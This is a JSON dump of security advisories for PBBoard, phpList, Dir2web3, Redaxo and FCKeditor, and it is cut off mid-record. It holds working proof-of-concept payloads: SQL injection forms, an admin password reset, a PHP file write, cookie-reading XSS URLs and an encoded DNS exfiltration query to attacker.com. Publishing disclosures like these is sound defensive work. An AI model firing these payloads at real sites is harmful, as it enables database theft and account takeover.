{"packetstorm": [{"lastseen": "2016-12-05T22:20:16", "description": "", "cvss3": {}, "published": "2012-08-09T00:00:00", "type": "packetstorm", "title": "PBBoard 2.1.4 SQL Injection / Improper Authentication / Broken Access Control", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4036", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-1216"], "modified": "2012-08-09T00:00:00", "id": "PACKETSTORM:115377", "href": "https://packetstormsecurity.com/files/115377/PBBoard-2.1.4-SQL-Injection-Improper-Authentication-Broken-Access-Control.html", "sourceData": "`Advisory ID: HTB23101 \nProduct: PBBoard \nVendor: www.pbboard.com \nVulnerable Version(s): 2.1.4 and probably prior \nTested Version: 2.1.4 \nVendor Notification: July 18, 2012 \nPublic Disclosure: August 8, 2012 \nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284] \nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036 \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application. \n \n \n1) Multiple SQL Injections in PBBoard: CVE-2012-4034 \n \n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"check[]\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"new_password\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \n \n \n2) Improper Authentication in PBBoard: CVE-2012-4035 \n \nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script. \n \nThe following PoC changes password for the user with ID=1 (forum administrator): \n \n \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1\"> \n<input type=\"hidden\" name=\"new_password\" value=\"new_password\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n \n3) Improper Access Control in PBBoard: CVE-2012-4036 \n \nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file. \n \nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration. \n \nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution: \n \n \n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"context\" value='<? phpinfo(); ?>'> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \nSuccessful exploitation of this vulnerability requires administrative priveledges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nApply 5-8-2012 Security Patch \n \nMore Information: \nhttp://www.pbboard.com/forums/t10352.html \nhttp://www.pbboard.com/forums/t10353.html \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23101 - https://www.htbridge.com/advisory/HTB23101 - Multiple vulnerabilities in PBBoard. \n[2] PBBoard - http://www.pbboard.com - PBBoard is a free flat-forum bulletin board software. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115377/pbboard-sqlbypass.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:23:02", "description": "", "cvss3": {}, "published": "2012-08-09T00:00:00", "type": "packetstorm", "title": "phpList 2.10.18 Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-09T00:00:00", "id": "PACKETSTORM:115378", "href": "https://packetstormsecurity.com/files/115378/phpList-2.10.18-Cross-Site-Scripting-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23100 \nProduct: phpList \nVendor: phpList Ltd \nVulnerable Version(s): 2.10.18 and probably prior \nTested Version: 2.10.18 \nVendor Notification: July 11, 2012 \nPublic Disclosure: August 8, 2012 \nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89] \nCVE References: CVE-2012-3952, CVE-2012-3953 \nCVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nRisk Level: Medium \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application. \n \n \n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952 \n \nInput passed via the \"unconfirmed\" GET parameter to /admin/index.php (when \"page\" is set to \"user\") is not properly sanitised before being returned to the user. \n \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n \n2) SQL Injection in phpList: CVE-2012-3953 \n \nInput passed via the \"delete\" GET parameter to /admin/index.php (when \"page\" is set to \"editattributes\") is not properly sanitised before being used in SQL query. \n \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \n \n \nThe following PoC demonstrates vulnerability exploitation under administrator's account: \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() -- \n \n \n \nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \n \n \n \nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. The following PoC code will simply display administrator cookies: \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \n \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to phpList 2.10.19 \n \nMore Information: \nhttp://www.phplist.com/?lid=579 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23100 - https://www.htbridge.com/advisory/HTB23100 - Cross-Site Scripting (XSS) in phpList. \n[2] phpList - http://www.phplist.com - phpList is the world's most popular open source email campaign manager. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115378/phplist21018-sqlxss.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:26", "description": "", "cvss3": {}, "published": "2012-08-05T00:00:00", "type": "packetstorm", "title": "Dir2web3 3.0 SQL Injection / Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4069", "CVE-2012-4070"], "modified": "2012-08-05T00:00:00", "id": "PACKETSTORM:115301", "href": "https://packetstormsecurity.com/files/115301/Dir2web3-3.0-SQL-Injection-Information-Disclosure.html", "sourceData": "`Title: \n====== \nDir2web3 Multiple Vulnerabilities \n \nDate: \n===== \n05/08/2012 \n \nAuthor: \n======= \nDaniel Correa (http://www.sinfocol.org/) \n \nVulnerable software: \n==================== \nDir2web v3.0 (http://www.dir2web.it/) \n \nCVE: \n==== \nCVE-2012-4069 \nCVE-2012-4070 \n \nDetails: \n======== \nThere are two vulnerabilities identified on Dir2web v3.0: \n \nInformation disclosure (CVE-2012-4069): \nDatabase folder is public and it is not protected via .htaccess. An attacker \ncan download the entire database and look for hidden pages on the website. \n \nSQL Injection (CVE-2012-4070): \nPreg_match function is not enough to protect GET/POST parameters. An \nattacker \ncan easily make a SQL Injection over the application. \n \nExploit: \n======== \nInformation disclosure: \nhttp://site/_dir2web/system/db/website.db \n \nSQL Injection: \nhttp://site/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- - \n \nPatch: \n====== \nInformation disclosure: \nCreate .htaccess file on _dir2web folder with the following content: \norder deny, follow \ndeny from all \n \nSQL Injection: \nFix the regular expression in dispatcher.php file located on \n_dir2web/system/src folder. \n \nReplace: \n'/[a-zA-Z0-9]{10}/' \nWith: \n'/^[a-zA-Z0-9]{10}$/' \n \nTimeline: \n========= \n13/07/2012: Vendor contacted \n25/07/2012: CERT contacted \n27/07/2012: CVE assigned \n05/08/2012: Vulnerability published on Bugtraq \n \n-- \nRegards, \nDaniel Correa \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115301/dir2web3-sqldisclose.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:09", "description": "", "published": "2012-07-25T00:00:00", "type": "packetstorm", "title": "Redaxo 4.4 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3869"], "modified": "2012-07-25T00:00:00", "id": "PACKETSTORM:115009", "href": "https://packetstormsecurity.com/files/115009/Redaxo-4.4-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23098 \nProduct: Redaxo \nVendor: Redaxo team \nVulnerable Version(s): 4.4 and probably prior \nTested Version: 4.4 \nVendor Notification: 4 July 2012 \nVendor Patch: 23 July 2012 \nPublic Disclosure: 25 July 2012 \nVulnerability Type: Cross-Site Scripting (XSS) \nCVE Reference: CVE-2012-3869 \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nRisk Level: Medium \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869 \n \n1.1 Input passed via the \"subpage\" GET parameter to /redaxo/index.php (when \"page\" is set to \"user\" or \"template\") is not properly sanitised before being returned to the user. \n \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. \n \nThe following PoC (Proof of Concept) demonstrate the vulnerability: \n \n \nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nApply vendor's patch: http://www.redaxo.org/files/sicherheitsupdate_4_3_und_4_4.zip \nMore Information: \nhttp://www.redaxo.org/de/download/sicherheitshinweise/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23098 - https://www.htbridge.com/advisory/HTB23098 - Cross-Site Scripting (XSS) in Redaxo. \n[2] Redaxo - http://www.redaxo.org/ - PHP MySQL Open Source Content Management System. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115009/redaxo-xss.txt"}, {"lastseen": "2016-12-05T22:13:57", "description": "", "cvss3": {}, "published": "2014-06-03T00:00:00", "type": "packetstorm", "title": "FCKeditor 2.6.10 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2014-06-03T00:00:00", "id": "PACKETSTORM:126902", "href": "https://packetstormsecurity.com/files/126902/FCKeditor-2.6.10-Cross-Site-Scripting.html", "sourceData": "`Class Cross-Site Scripting \nRemote Yes \nPublished 2nd June 2014 \nCredit Robin Bailey of Dionach (vulns@dionach.com) \nVulnerable FCKeditor <= 2.6.10 \n \nFCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser. \n \nFCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable. \n \nNote that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded. \n \nPoC: \n \nPOST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php \ntextinputs[1</script><script>alert(document.cookie);//</script>]=zz \n \nThe vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement: \n \nhttp://ckeditor.com/blog/FCKeditor-2.6.11-Released \n \nTimeline: \n \n28/05/2014 Vulnerability identified \n28/05/2014 Initial vendor contact \n28/05/2014 Vendor response to contact \n28/05/2014 Vulnerability disclosed to vendor \n29/05/2014 Vendor confirms vulnerability \n02/06/2014 Vendor releases patch \n02/06/2014 Public disclosure of vulnerability \n \n______________________________________________________________________ \n \nDisclaimer: This e-mail and any attachments are confidential. \n \nIt may contain privileged information and is intended for the named \naddressee(s) only. It must not be distributed without Dionach Ltd consent. \nIf you are not the intended recipient, please notify the sender immediately and destroy this e-mail. \n \nAny unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd. \n \nDionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242 \n \n______________________________________________________________________ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126902/fckeditor2610-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "htbridge": [{"lastseen": "2020-12-24T11:33:44", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application. \n \n1) Multiple SQL Injections in PBBoard: CVE-2012-4034 \n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_r eplys=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"check[]\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"new_password\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \n \n2) Improper Authentication in PBBoard: CVE-2012-4035 \nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script. \nThe following PoC changes password for the user with ID=1 (forum administrator): \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1\"> \n<input type=\"hidden\" name=\"new_password\" value=\"new_password\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n3) Code Injection in PBBoard: CVE-2012-4036 \nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file. \nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration. \nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution: \n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_na me=file.php\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"context\" value='<? phpinfo(); ?>'> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \nSuccessful exploitation of this vulnerability requires administrative priveledges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \n", "edition": 2, "cvss3": {}, "published": "2012-07-18T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in PBBoard", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1216", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-4036"], "modified": "2012-08-07T00:00:00", "id": "HTB23101", "href": "https://www.htbridge.com/advisory/HTB23101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:33:46", "description": "High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application. \n \n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952 \nInput passed via the \"unconfirmed\" GET parameter to /admin/index.php (when \"page\" is set to \"user\") is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28 document.cookie%29;%3C/script%3E \n \n2) SQL Injection in phpList: CVE-2012-3953 \nInput passed via the \"delete\" GET parameter to /admin/index.php (when \"page\" is set to \"editattributes\") is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \n \nThe following PoC demonstrates vulnerability exploitation under administrator's account: \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() -- \n \nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of 